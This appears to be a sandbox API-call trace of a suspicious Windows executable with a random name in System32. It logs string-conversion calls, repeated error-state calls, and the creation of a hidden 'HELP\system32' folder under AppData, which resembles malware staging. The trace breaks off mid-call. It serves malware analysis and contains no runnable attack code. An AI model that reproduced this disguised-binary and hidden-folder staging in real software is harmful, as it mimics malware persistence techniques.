\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x11þõ|ó0", lpUsedDefaultChar=0x0) returned 256 [0031.430] GetLastError () returned 0x0 [0031.430] SetLastError (dwErrCode=0x0) [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x30eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā") returned 256 [0031.430] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.430] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā", cchSrc=256, lpDestStr=0x30e988, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x30f044, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x11þõ|ó0", lpUsedDefaultChar=0x0) returned 256 [0031.431] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.431] SetLastError (dwErrCode=0x0) [0031.431] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.432] SetLastError (dwErrCode=0x0) [0031.432] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.433] GetLastError () returned 0x0 [0031.433] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.434] SetLastError (dwErrCode=0x0) [0031.434] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.435] SetLastError (dwErrCode=0x0) [0031.435] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.436] SetLastError (dwErrCode=0x0) [0031.436] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.437] SetLastError (dwErrCode=0x0) [0031.437] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.438] SetLastError (dwErrCode=0x0) [0031.438] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.439] SetLastError (dwErrCode=0x0) [0031.439] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.440] GetLastError () returned 0x0 [0031.440] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.441] SetLastError (dwErrCode=0x0) [0031.441] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.442] SetLastError (dwErrCode=0x0) [0031.442] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.443] SetLastError (dwErrCode=0x0) [0031.443] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.444] SetLastError (dwErrCode=0x0) [0031.444] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.445] GetLastError () returned 0x0 [0031.445] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.446] SetLastError (dwErrCode=0x0) [0031.446] GetLastError () returned 0x0 [0031.447] SetLastError (dwErrCode=0x0) [0031.447] GetLastError () returned 0x0 [0031.447] SetLastError (dwErrCode=0x0) [0031.447] GetLastError () returned 0x0 [0031.447] SetLastError (dwErrCode=0x0) [0031.447] GetLastError () returned 0x0 [0031.447] SetLastError (dwErrCode=0x0) [0031.448] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.448] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.448] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.449] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f3c0 | out: lpSystemTimeAsFileTime=0x30f3c0*(dwLowDateTime=0xe078e1f0, dwHighDateTime=0x1d3dfba)) [0031.450] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f2f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.450] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x30f1e0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetLastError () returned 0x0 [0031.450] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.450] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.450] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.451] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.451] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.451] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.451] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.451] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.451] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.451] CreateDirectoryA 